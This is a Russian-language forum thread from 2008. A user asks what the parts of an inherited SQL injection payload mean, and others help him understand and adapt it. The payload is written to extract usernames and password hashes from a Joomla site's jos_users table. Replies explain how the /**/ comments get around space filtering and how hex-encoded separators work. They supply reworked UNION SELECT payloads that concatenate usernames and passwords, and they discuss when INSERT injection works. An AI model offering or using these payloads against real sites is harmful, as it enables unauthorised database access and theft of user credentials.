Приветствую!
У меня проблема следующего плана, есть сформированый до меня sql запрос: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
Очень хотелось бы составить свой, но меня пугают символы:
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
что они означают, и как с ними разобраться, не могли бы вы помочь, или хотя бы кинуть ссылку а толковый мануал?!
Цитата | Quote(Rain of Dark @ 12.03.2008 - 5:52)
0x3a
Это шестнадцатеричное представление символа : (двоеточие).
Цитата | Quote
есть сформированый до меня sql запрос
Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок.
Цитата | Quote
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):
+union+select+1,concat(username,0x3a,password),3,4+from+jos_users
+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users
+union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+
jos_users
+ заменишь на /**/ если не прокатит...
PS: покажи где ты оное нашел.
Цитата | Quote(delay(0) @ 12.03.2008 - 16:56)
Цитата | Quote
есть сформированый до меня sql запрос
Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок.
Цитата | Quote
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):
+union+select+1,concat(username,0x3a,password),3,4+from+jos_users
+union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users
+union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+
jos_users
+ заменишь на /**/ если не прокатит...
PS: покажи где ты оное нашел.
_http://www.xakep.ru/post/42707/default.asp
то есть я правильно понимаю? "/**/"="+", а "0x3a"=":"
А почему тогда просто "+" не использовали?
А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"?
а можно вместо select insert использовать?
Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
то есть я правильно понимаю? "/**/"="+", а "0x3a"=":"
Нет, /**/ - обход фильтрации пробелов, "+", он же %20, он же пробел, может фильтроваться в запросах.Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
А почему тогда просто "+" не использовали?
См. выше.Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"?
Почитай статьи по sql-иньекциям, их в интернете великое множество.Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16)
а можно вместо select insert использовать?
Нет, после union insert использовать нельзя.Цитата | Quote(delay(0) @ 13.03.2008 - 0:10)
Нет, после union insert использовать нельзя
а вообще, кроме select?
Цитата | Quote(Rain of Dark @ 12.03.2008 - 16:38)
а вообще, кроме select?
Что? Цитата | Quote(delay(0) @ 13.03.2008 - 2:48)
Что?
ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д
Цитата | Quote(Rain of Dark @ 13.03.2008 - 6:41)
ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д
Тю, я ступил, insert юзать можно, но при magic quotes = off, тоесть, ' не должны экранироваться. экранироваться = фильтроваться? Оо
SoftoRooM © 2004-2024